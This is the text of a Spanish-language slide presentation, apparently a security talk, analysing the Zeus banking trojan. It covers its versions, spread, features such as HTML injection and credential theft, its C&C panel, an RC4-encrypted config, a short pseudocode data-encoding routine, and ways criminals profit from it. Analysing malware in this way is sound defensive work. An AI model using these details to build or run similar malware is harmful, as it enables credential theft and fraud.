  • 36. ZEUS – CAMBIOS IMPORTANTES Corrección de bugs • Mal saneamiento de parámetros • Escritura de ficheros • ¡Guerra! 10-12-2008 → RC4 • Local data requests to the server and the configuration file can be encrypted with RC4 key depending on your choice
  • 37. ZEUS
  • 38. ZEUS Distribución • SPAM • Facturas • E-cards • Michael Jackson • Kits de exploits
  • 39. ZEUS - CARACTERÍSTICAS Bot Actualización configuración Actualización del binario /etc/hosts Socks proxy Inyección HTML Redirección HTML Capturas de pantalla Capturas de teclados virtuales Captura de credenciales Robo certificados KillOS
  • 40. ZEUS - TODO Compatibility with Windows Vista and Windows 7 Improved WinAPI hooking Random generation of configuration files to avoid generic detection Console-based builder Version supporing 64 bit processors Full IPv6 support Detailed statistics on antivirus software and firewalls installed on the infected machines
  • 41. ZEUS
  • 42. ZEUS - FICHEROS 1.0.x.x • ntos.exe • wnspoemaudio.dll • wnspoemvideo.dll … … 1.2.x.x • sdra64.exe • lowseclocal.ds • lowsecaudio.ds ¿1.3.x.x? • bootwindows.exe • skype32win32post.dll • skype32win64post.dll
  • 43. ZEUS
  • 44. ZEUS
  • 45. ZEUS Config file: • Cifrado con RC4 • Update binary • Url C&C server • Advanced configuration • Webfilters • WebFakes • WebInjects
  • 46. ZEUS Ficheros de datos • Cifrado RC4 al servidor • Cifrado. For i = 1 to Length(Data) If (i % 2) == 0 Data[i] -= 7 + i * 2 Else Data[i] += 10 + i * 2
  • 48. ZEUS - C&C Instalación: • Siguiente → Siguiente → Final PHP + mysql • O ficheros Generador de ficheros de configuración y binarios. Opciones del panel de control
  • 49. ZEUS - C&C Instalación: • Siguiente → Siguiente → Final PHP + mysql • O ficheros Generador de ficheros de configuración y binarios. Opciones del panel de control
  • 50. Zeus – C&C Opciones • Botnet : Bots online • Botnet : Comandos remotos • Logs : Búsqueda • Logs : Ficheros subidos • System : Perfil • System : Opciones
  • 51. ZEUS
  • 52. ZEUS KillOS • HKEY_CURRENT_USER • HKEY_LOCAL_MACHINEsoftware • HKEL_LOCAL_MACHINEsystem • Trata de llenar de ceros toda la memoria. • BSOD
  • 53. ZEUS KillOS • HKEY_CURRENT_USER • HKEY_LOCAL_MACHINEsoftware • HKEL_LOCAL_MACHINEsystem • Trata de llenar de ceros toda la memoria. • BSOD
  • 55. LUCRO Crear malware y venderlo Crear botnet y alquilarla Obtención de credenciales y venderlas Obtención de dinero gracias a las credenciales
  • 56. LUCRO
  • 57. LUCRO
  • 58. LUCRO
  • 59. LUCRO
  • 60. LUCRO Transferencias Compra de bienes • Físicos • Virtuales Subastas ...deja volar tu imaginación
  • 61. *[ MUCHAS GRACIAS ] Pág. 61